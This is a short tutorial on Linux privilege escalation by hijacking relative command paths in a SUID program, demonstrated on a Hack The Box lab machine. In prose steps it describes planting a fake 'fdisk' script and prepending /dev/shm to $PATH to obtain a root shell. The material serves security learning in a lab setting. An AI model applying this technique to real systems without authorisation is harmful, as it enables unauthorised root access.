LINUX PRIVILEGE ESCALATION
Hijacking Relative Paths in SUID Programs
Linux Privilege Escalation Technique
There are many common techniques in Linux privilege escalation that are related to abusing SUID programs. In this quick tutorial, we will talk about the method of hijacking relative paths to escalate privileges.
Before we get started, let’s create a baseline understanding of what SUID is, the difference between Absolute paths and Relative paths, and how we can use them to our advantage.
$_Set_User_ID:
SUID, known as (Set User ID), is a special Linux type permission that allows a user to run a file with the same level of permission as the file owner. Meaning, if a high privileged user owns the SUID file as root, the low privileged user can run the file with the root permissions.
💡Only Linux executables can be abused if the SUID is misconfigured; it does nothing work on regular files, i.e., Python, Bash, Ruby, etc.
$_Asbolute_Path_VS_Relative_Path:
The absolute path is the full path that starts with the root directory (forward slash /) and goes up to the file or the directory requested. To know the absolute path of a file or directory, quickly run the pwd command, and the complete path will be displayed to you.
Absolute paths don’t change when the current directory changes. Think about them as hardcoded paths, while relative paths are dynamic paths that change depending on the current location of the working directory.
To demo this technique, I picked up the Magic machine from Hack the box; the machine has a custom executable with SUID flag on called Sysinfo that uses relative paths to execute system commands — [free,lshw, fdisk, cpuinfo].
When debugging the program with strace, we see the sysinfo program executing 4 system commands — free,lshw, fdisk and cpuinfo without their absolute full paths; it uses relative paths instead (see the picture below)
This opens the door for us to exploit the commands path by creating shell files in the name of these commands and add the current directory path to our environment variable that can be called when the Sysinfo program runs.
📝The trick here is that relative paths are dynamic paths that change depending on the working directory’s of the current location. So when we inject the current working directory in our Environment variable $PATH, the program executes the commands in its current path rather than looking for the their original full paths.
$_Exploitation_Demo:
- Create a script file with bash or python shell and name it as one of the commands used in Sysinfo program example “fdisk’’
2.Make the file executable.
3.Modify the Environment Path to include the current working directory. Here is our original unchanged $PATH.
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
Adding the current working directory by including pwd path in the environment variable $PATH
New modified $PATH :
Now, whenever the Sysinfo program is called using the relative paths, it checks for the file “fdisk” in all of the folders in the $PATH variable until it finds the match. In this case it calls our modified file in the /dev/shm directory and get us our root shell 😈
